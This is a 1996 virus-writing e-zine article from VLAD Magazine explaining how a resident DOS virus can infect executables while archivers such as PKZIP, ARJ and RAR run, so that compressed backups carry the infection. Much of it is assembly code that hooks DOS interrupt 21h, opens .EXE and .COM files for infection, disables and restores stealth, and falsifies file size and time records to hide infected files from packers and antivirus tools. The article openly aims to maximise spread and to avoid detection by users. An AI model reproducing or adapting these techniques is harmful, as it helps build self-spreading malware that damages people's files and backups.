VLAD Magazine - Issue #7 - ARTICLE.4_2 - Archive Infect/Infection on Compression

1.     S T R A T E G Y : I N F E C T I O N  O N  C O M P R E S S I O N
2.      _______________________________________________________________
3.  
4.         (c) 1996 by MGL. None of this article may be used or
5.         spread in any form without written permission of the
6.         author. All rights are reserved for future use.
7.  
8.  
9.     0.) Sad news
10.  
11.         I am not proud to announce to the world that our group, SVL
12.         ended work due to some unfortunate circumstances.
13.     So that was that. :-((((((((((((((((((((((((((((((((((((((
14.  
15.  
16.     1.) Introduction.
17.  
18.  
19. Well, it has been discussed many times, switching to fast infection when an
20. attempt to run some compression software is made.  It is a kewl idea and
21. moreover a good way to penetrate the backups. But nothing is as easy as
22. it appears to be. This is also the reason why I want to share some of my
23. latest experiences with you.
24.  
25. Basically, I assume all of you can code a resident virus, because if
26. you can't, just skip this article or read it again sometime in
27. the near ( or far if you're lazy ) future.
28. All the code presented in this article is meta-code, it just illustrates
29. the way the virus should work. It's not optimised, nor part of any virus.
30.  
31.  
32.     2.) Which packer should I support in the virus ?
33.  
34.  
35. Good question. There are shitloads of them. It's a complete waste of
36. code to support packers that aren't very common. You should select only
37. those that every lamer has on his HD. That means ( present situation )
38. supporting ARJ, Pkzip/Pkunzip, RAR, LHA, UC. If you decide to select these
39. five packers, it is nearly guaranteed your virus can hurt 90 % of systems
40. in the whole Universe.  Ofcos, in some regions there's another list of
41. 'most used ', but remember : you're the author, you have the choice.
42. You do not need know how good these packers are ( that isn't 100 % true, cos
43. the better are used more ), all you need to know is how the packers work.
44.  
45.  
46.     3.) How the packer works.
47.  
48.  
49. Uff ! Don't be scared, you don't need to disassemble the whole packer !
50. ( of cos it is once again not 100 % true, so obtain Soft-ice 2.80 now )
51. It is about knowing the principles WHAT THE PACKER SHOULD DO. Every packer
52. works similarly to that described below :
53.  
54.  
55.     1.  Find files to be packed
56.     2.  Open/create file in which everything'll be packed
57.     3.  Find 1st file to be packed
58.     4.  Open the file to be packed
59.     5.  Pack the file
60.     6.  Add packed file to archive
61.     7.  Close file to be packed
62.     8.  Last file ? If so , go to line 10
63.     9.  Find next file to pack and go to line 4
64.     10. Close archive and exit
65.  
66. Simple, isn't it ? But in section 5.) i'll describe possible problems.
67.  
68.  
69.     4.) What should the virus do ?
70.  
71.  
72. As I mentioned in the introduction, the virus has to be resident. Then it
73. will control all INT 21H / 4BH calls. If such a call apprears just test to
74. see if the ASCIIZ ( ASCII , ended by '0' ) string pointed by DS:DX contains
75. one of the names of the supported packers.  Then, if your virus is stealth
76. (and I hope it is ), switch all stealth capabilities off. You ask why ?
77. The reason is simple : the packer needs to know the real file size of the
78. file being processed, and of course the virus can't infect any file without
79. knowing its real size . Second, set the infection mode to the 'fastest
80. possible' - what that means is open for further discussion. And thats all
81. folks on INT 21H / 4BH for now.
82.  
83. Thirdly, infect the files ( this important point'll be discussed later in
84. this article ). And last but not least, on INT 21H / 4CH don't forget to
85. disable the 'fastest possible' infection mode and for the Lamer's sake, turn
86. all stealth back on !
87.  
88. If you are suspicious and you know Murphy's Law 'If something can go wrong,
89. it will ! ', you should also handle the situation when the packer calls for
90. an external compression executable called e.g. 'fucklame.exe' which
91. after processing the file and creating the compressed image in memory exits
92. via the normal INT 21H / 4CH back to the packer. According to the stuff you
93. read above, the virus now turns stealth on and sets another infection
94. strategy ...
95.  
96. To prevent such a mistake, you can get the current PID ( segment address of
97. the PSP of current process ) by using INT 21H / 62h or INT 21h /51H - both
98. calls are equal and moreover - BOTH DO NOT USE ANY OF THE DOS INTERNAL STACKS
99. and that means you can use structures like
100.  
101.     mov ah,62h
102.     int 21h
103. or
104.     mov ah,51h
105.     int 21h
106.  
107. directly in your interrupt handler ( in DOS 3.0 and above ) ! Both the calls
108. return in the PID in BX so then
109.  
110.     mov word ptr cs:[U_cant_fool_me-ReloCount],bx
111.  
112. and after storing the PID allow normal INT 21H / 4BH. Then you can test on
113. INT 21H / 4CH the parents PID
114.  
115. int21_fn_4c_entry:
116.     push bx
117.     push ds
118.     push ax
119.     mov ah,51h
120.     int 21h
121.     mov ds,bx
122.     mov ax, word ptr [ds:16h]
123.  
124. because the PSP on offset+16h holds the segment of parent PID ( from which
125. the file has been executed via INT 21H / 4Bh and whose PID we have stored
126. in the variable U_cant_fool_me ), the following code applies:
127.  
128.     cmp word ptr cs:[U_cant_fool_me-ReloCount],ax
129.     jne skip_some_lines
130.     mov byte ptr cs:[Stealth-ReloCount],switch_on
131.     mov byte ptr cs:[Strategy-ReloCount],another_one
132. skip_some_lines:
133.     pop ax
134.     pop ds
135.     pop bx
136.     jmp far ptr dword cs:[Original_DOS_vector-ReloCount]
137.  
138. Now you can be sure that your virus turn on stealth only when the packer
139. really ends its work. The same structure on INT 21H /4CH can be used when
140. you handle some AV, and you also disable stealth for this reasson.
141.  
142.  
143.     5.) When to infect the file ?
144.  
145.  
146. To questions answer is not as trivial as it seems to be !
147. It is caused by :
148.     a.) The way packer works
149.     b.) The virus itself
150.  
151. b.)
152. I am sorry , but i'll discuss the point b.) as first . There are only two
153. 'not very suspicious' ways to mark the file as infected which aren't too
154. hard to code : time-stamp ( preferrably some specific legal one ) and size
155. padding.
156. Time stamp marking is very easy to code and works well with full file stealth
157. but when you support some packers in your virus, get ready for big trouble.
158. All the needed stuff is in the section 'Time stamp viruses'.
159. Size padding is harder to code, with full-stealth it's quite complicated, but
160. you'll probably have no problems with implementing packer support in your vx,
161. with only one exception, see the section 'Size padding viruses' for details.
162.  
163. a.)
164. According to algorithm described in section 3.) everyone can assume that the
165. right moment for infection is INT 21H / 3DH - open file . This conclusion is
166. up to 95% correct . It has lot of strong points : DX:DX points to a buffer
167. which contains an ASCIIZ string with filename and path, the 3 lowest bites
168. in  AL describe the open mode ( 000 - read , 001 - write , 010 - read and
169. write ). So it is easy to force it open for read/write access, and infect
170. the file pointed by DS:DX . Ofcos, I can tell you, it is not :-)
171.  
172.  
173.     6.) Solutions
174.  
175.  
176.     6.1. ) Size padding viruses.
177.  
178.  
179. This section'll be very short . There is no reason the strategy described in
180. section 5a. could fail with most packercs. Because if your virus infects the
181. file on file open, and then marks it by padding the size to some 'magic'
182. value, the packer should reach the EOF mark . Our virus will, after executing
183. the packer, infect the file and then pad the file to the 'magic' size. Then
184. the compressed file will be infected.  That means the infected file will be
185. marked as infected and correctly stealthed . There is ONLY one EXCEPTION i
186. know : PKZIP . How to fool this one is described in section 6.2
187. Maybe the packer will protest when extracting the files from the archive,
188. because the stored size in archive header and size of extacted file
189. didn't match, but there's only a small probability that the packer checks
190. for this.
191.  
192. I have to say, I didn't test the file padding with archivers - cos i was too
193. lazy to code it. But of all 5 packers tested by me, only pkzip causes
194. problems. RAR , UC , ARJ , LHA - all read until EOF is reached !
195.  
196.  
197.     6.2. ) Time stamp viruses .
198.  
199.  
200. So this section is really the crucial part of the article . If you use the
201. strategy from section 5a you 'll get following result :
202.  
203.  
204.   Packer name                   F1              F2              Result
205.        
206.     LHA                     +               +                GOOD
207.        
208.     RAR                     +               -                POOR
209.  
210.     ARJ                     +               -                POOR
211.  
212.    Pkzip/Pkunip                 +               -                POOR
213.  
214.     UC                      +               -                POOR
215.  
216. Legend :        F1 - file which was infected on archivation and is located in
217.              specified directory
218.         F2 - file which has been extracted from archive we infected
219.         +  - infected and stealthed
220.         -  - infected and not stealthed
221.  
222. As you can see something went wrong. And after breaking your head with this
223. little problem you say : " Shit, the file is not marked as infectded !". And
224. that's problem we have to solve. If you are lazy, support only LHA . But for
225. correctly infecting with other packers we need to infect the file and mark it
226. PRIOR to opening.
227.  
228. Every packer has to scan the actual directory for files which should be
229. compressed.  This is done by just a normal INT 21H / 4Eh and INT 21H / 4FH.
230. As i assume your virus has at least semi-stealth implemented, then your virus
231. has to handle these two subfunctions of INT 21H. After such a call the virus
232. fixes the file size in the DTA ( Disk Transfer Address ) - I hope it's called
233. semi-stealth.  Handling INT 21H FN 4EH /4FH will add only few lines of extra
234. code to your virus.
235. The situation before such a call from the packer is mostly as described
236. below :
237.  
238.  
239. �����> DS:DX  point to ASCIIZ filename to match. Mostly it contains something
240. �             like '????????.???',0
241. �      AH     of course 4EH or 4FH
242. �      CX     atributes to match, for us uninteresting, cos every normal
243. �             virus can infect files with any attributes set
244. �
245. ������ As you can see, nothing useful for our purposes :-P
246.  
247. Here i would like to note, that you do not need to know path to files which
248. should be compressed or the name of the actual directory . You are already
249. in the directory where the target files are located ( courtesy of the packer
250. which is active ) , or the call will fail.
251.  
252.  
253. But the situation right after the allowed call of INT 21H 4EH/4FH is the most
254. important for us : if the call fails, nevermind, try it next time. If the
255. call succeded, the DTA is filled with data we require. Here is the DTA
256. structure once again :
257.  
258.  
259.     ������������������������������������������������������������Ŀ
260.     � 00h � bits 0-6 holds drive letter , bit 7 is set if remote �
261.     ������������������������������������������������������������Ĵ
262.     � 01h � 11 bytes search template                             �  
263.     ������������������������������������������������������������Ĵ
264.     � 0Ch � search atributes                                     �  
265.     ������������������������������������������������������������Ĵ
266.     � 0Dh � entry count within directory                         �  
267.     ������������������������������������������������������������Ĵ
268.     � 0Fh � cluster number of start of parent directory          �  
269.     ������������������������������������������������������������Ĵ
270.     � 11h � 4 bytes reserved                                     �  
271.     ������������������������������������������������������������Ĵ
272.     � 15h � atributes of file which was found                    �  
273.     ������������������������������������������������������������Ĵ
274.     � 16h � file time                                            �  
275.     ������������������������������������������������������������Ĵ
276.     � 18h � file date                                            �  
277.     ������������������������������������������������������������Ĵ
278.     � 1Ah � file size , this one is DWORD !                      �  
279.     ������������������������������������������������������������Ĵ
280.     � 1Eh � filename and extension in ASCIIZ                     �  
281.     ��������������������������������������������������������������
282.  
283. As you can see, offset DTA+1Eh is the ASCIIZ file name - we 'll need it
284. for file open.
285.  
286. int21_fn_4e_entry:
287. int21_fn_4f_entry:
288.     pushf
289.     call far ptr dword cs:[Original_DOS_vector-ReloCount]
290.     pusha
291.     push es
292.     push ds
293.     pushf
294.  
295. First check if the archiver is actually processing. If not, skip the whole
296. infection stuff.
297.  
298.     cmp byte ptr cs:[Archiver_active_flag-ReloCount],set
299.     jne Skip_infection
300.  
301. To get the filename from the DTA is easy
302.  
303.     mov ah,2f
304.     pushf
305.     call far ptr dword cs:[Original_DOS_vector-ReloCount]
306.  
307. ES:BX now points to the beginning of the DTA, so ES:BX+1EH is the filename
308. and ES:BX+26H points to file extension. Remember the file is not yet open.
309. But before opening a test for *.exe or *.com has to be done.
310.  
311.     push es
312.     pop ds
313.     add bx,1eh
314.     xchg bx,dx
315.     cmp word ptr ds:[dx+8],'XE'
316.     je Open_file
317.     cmp word ptr ds:[dx+8],'OC'
318.     jne Exit
319. Open_file:
320.     mov ax,3d02h
321.     pushf
322.     call far ptr dword cs:[Original_DOS_vector-ReloCount]
323.     jc Exit
324.     xchg ax,bx
325.     call Infect_file
326.  
327. Here you have a free choice. You can infect the filename pointed to by DS:DX
328. or the handle in bx . Both are quite easy to code.
329.  
330.     pushf
331.     mov ah,3e
332.     call far ptr dword cs:[Original_DOS_vector-ReloCount]
333.  
334.  
335. As the DTA is filled with data, we need to test if stealth is necessary
336.  
337. Skip_infection:
338.     cmp byte ptr cs:[Stealth-ReloCount],switch_off
339.     je Skip_size_stealth
340.     call Size_stealth_on_4e_and_4f
341.  
342.  
343. Before exiting pop all stored registers
344.  
345. Skip_size_stealth:
346. Exit:
347.     popf            ; btw, do you know that such a exit can hang
348.     pop ds          ; the system sometimes ? Everytime you push the
349.     pop es          ; flags on the stack inside an interrupt handler, any
350.     popa            ; other interrupts are disabled. So this part
351.     retf 2          ; of code can exit the handler with disabled
352.             ; interrupts . That may cause the system to hang with
353.             ; some software written in asm. Languages like
354.             ; C++ and Pascal ( |-P ) have this fixed...
355.  
356. So, now our virus infects files on INT 21H / 4EH and INT 21H / 4FH. But
357. at this moment that doesn't change anything in the DTA after INT 21H 4EH/4FH.
358. If we repeat the tests with all packers again , we'll get these results :
359.  
360.  
361.   Packer name                   F1              F2              Result
362.        
363.     LHA                     +               +                GOOD
364.        
365.     RAR                     +               +                GOOD
366.  
367.     ARJ                     +               +                GOOD
368.  
369.    Pkzip/Pkunip                 +               -                POOR
370.  
371.     UC                      +               -                POOR
372.  
373.  
374. Just changing the INT 21H subfunction on which the virus infects files with
375. no code addition caused correct infection with two other packers. But
376. Pkzip/Pkunzip and UC are still a problem for our virus . You can change
377. the subfunction all you want but this method'll bring nothing more.
378.  
379. As i dissassembled those two 'nice' packers , i found such a structure :
380.  
381.     1.      Get DTA ( INT 21H / 2Fh )
382.     2.      Store it on the stack
383.     3.      Set new DTA ( INT 21H / 1A )
384.     4.      Find 1st matching file ( INT 21 / 4E )
385.     5.      Pop saved stuff
386.     6.      Restore original DTA
387.     and the same x-times round ....
388.  
389.  No open file here !!! That means in plain text : UC and Pkzip first get
390. information about all the files and then start to process it all. And
391. as we allowed the INT 21H / 4EH or INT 21H / 4FH call and then infected the
392. victim, no change in the DTA has been done and so the packer uses values
393. which were correct BEFORE INFECTION, but aren't afterwards ! The problem is
394. about fixing the DTA.
395.  
396. UC only requires fixing the file time in the DTA for correct infection. That
397. means patching the word at address DTA+16H to our value (eg. 40 seconds ).
398. Then will UC works with our virus fine.
399.  
400. With Pkzip/Pkunzip the situation not so easy. From all five packers tested
401. by me, only this one gets the size of the packed file from the DTA saved
402. earlier. That means the packed infected executable will always be corrupted.
403. Cruel, isn't it ? To fix the problem, we have to fix the DTA, but not only
404. the file time, but also the file size in DTA. That means to add the size
405. of the added code to the word at address DTA+1AH and to fix file time on
406. DTA+16H .
407.  
408.  
409. If you modify the virus code as described above, you get nice results :
410.  
411.  
412.   Packer name                   F1              F2              Result
413.        
414.     LHA                     +               +                GOOD
415.        
416.     RAR                     +               +                GOOD
417.  
418.     ARJ                     +               +                GOOD
419.  
420.    Pkzip/Pkunip                 +               +                GOOD
421.  
422.     UC                      +               +                GOOD
423.  
424.  
425.  
426.     7.) Summary .
427.  
428. To infect a file when a packer is working is a good way of spreading.
429. The best point for infection is INT 21H / 4EH and INT 21H / 4FH. Just
430. by placing the infection routine here you can infect RAR, ARJ and LHA with
431. no problems at all ( no matter what you use as infection marker ). If you
432. want to handle infection with UC, and your virus uses file time/date
433. as an infection marker you have to fix it in the DTA after infection.
434. The most shitty packer is Pkzip/Unzip. You have to handle DTA file time/date
435. and file size. This DTA size-fix is NECESSARY for BOTH usual TYPES OF MARKER
436. ( size padding & time stamp ), cos pkzip processes files only to ITS SAVED
437. FILE SIZE.
438.  
439. Ofcos, there are several problems here. A packer with graphical user
440. interface ( rar , uc ) can show the size of the added code, or even the
441. whole virus ( rar ) as most viruses have stealth disabled when some
442. packers are active. The possible solution  -  analysing the command
443. line parameters - is too complicated, too long, so the best idea is
444. to forget it, hoping the user won't notice it at all. [ this is
445. the method of solving a problem by it's ignoration - quite common in the
446. software industry :-) , so why not use it in viruses ? ]
447. Moreover, the most bloody situation is with AV products able to test
448. packed archives. Here there is nearly no way to stealth the infected files.
449. But, this problem can be also ignored, cos testing archives for
450. infection is slow and takes shitload of time, so the normal user has his
451. AV package configured to skip testing archives.
452.  
453. And last but not least, the viruses' spread could be too fast, ofcos
454. this one problem can be handled very easy .
455.  
456.  
457. I hope this article helped you to gain new information. I am open
458. for any discussion, and i'll welcome any tips and hints u can tell
459. me. I can be reached on IRC, on #........ and #... ( channel names
460. were cleared by the ........ ( also cleared )
461.